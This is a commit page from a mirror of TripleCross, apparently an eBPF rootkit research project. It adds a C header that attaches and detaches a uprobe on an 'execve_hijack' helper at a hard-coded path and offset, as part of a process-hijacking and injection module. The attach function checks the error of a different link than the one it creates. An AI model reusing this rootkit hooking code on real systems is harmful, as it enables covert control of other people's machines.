admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 19:03:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack.

Browse Source
This commit is contained in:
h3xduck
2022-03-03 05:53:51 -05:00
parent e64839f080
commit 0c88d5baa9
19 changed files with 1931 additions and 1817 deletions
Download Patch File Download Diff File Expand all files Collapse all files

35
src/user/include/modules/injection.h Normal file
View File

@@ -0,0 +1,35 @@
#ifndef __MOD_INJECTION_H
#define __MOD_INJECTION_H
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include "kit.skel.h"
#include "common.h"
//Connections
int attach_uprobe_execute_command(struct kit_bpf *skel){
skel->links.uprobe_execute_command = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
printf("SET\n");
return libbpf_get_error(skel->links.tp_sys_enter_execve);
}
int attach_injection_all(struct kit_bpf *skel){
return attach_uprobe_execute_command(skel);
}
int detach_uprobe_execute_command(struct kit_bpf *skel){
int err = detach_link_generic(skel->links.uprobe_execute_command);
if(err<0){
fprintf(stderr, "Failed to detach fs link\n");
return -1;
}
return 0;
}
int detach_injection_all(struct kit_bpf *skel){
return detach_uprobe_execute_command(skel);
}
#endif